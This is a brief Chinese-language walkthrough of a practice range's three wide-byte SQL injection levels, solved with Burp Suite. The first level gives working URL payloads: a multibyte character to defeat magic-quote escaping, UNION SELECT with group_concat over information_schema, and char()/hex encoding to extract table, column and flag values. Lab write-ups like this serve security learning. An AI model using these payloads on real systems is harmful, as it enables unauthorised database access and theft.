靶場三關: 使用工具:Burpsuite
http://59.63.200.79:8812/New/WidecharBased/RankOne/sql-one/
http://59.63.200.79:8812/New/WidecharBased/RankTwo/sql-two/
http://59.63.200.79:8812/New/WidecharBased/RankThree/sql-three/
寬字節注入第一關
首先進入靶場,?id=1:
加單引號嘗試是否報錯有SQL注入可能:
發現有反斜線魔術引號存在,使用漢字將反斜線、引號搞掉:?id=1汗’ order by 3 —+:
搞掉並且閉合。
然后按步驟進行:
1、測字段數:order by ,測出字段數為三
2、Union select 1,2,3側回顯點為2,3
3、因為輸出范圍很大,所以使用group_concat()函數輸出結果,測庫名、表名、字段名、flag.
表名:?id=9.999汗’%20%20 union select 1,2,group_concat( table_name ) from information_schema.tables where table_schema=database() —+
字段名:?id=9.999汗’ union select 1,2,group_concat( column_name ) from information_schema.columns where table_name=char(122,107,97,113) —+
此處使用char()函數繞過魔術引號
Flag:?id=9.999汗’%20%20 union select 1,2,group_concat( flag) from%20 zkaq— +
發現這里的表名沒魔術引號
zKaQ:?id=9.999汗’%20%20 union select 1,2,group_concat(zKaQ) from%20 zkaq—+
寬字節注入第二關
和第一題一樣的測試方法:
同樣有魔術引號,但是是雙引號
閉合方法:
其他步驟與第一題類似。
寬字節注入第三關
使用burpsuite 抓包:
引號檢驗測試發現這道題可能是post注入與魔術引號結合的問題。先閉合嘗試
可以閉合
然后繼續post注入的方法:
測出回顯點為1和2.
獲得表名。
16進制繞過魔術引號,獲得字段名
獲得flag.
做以記錄,備忘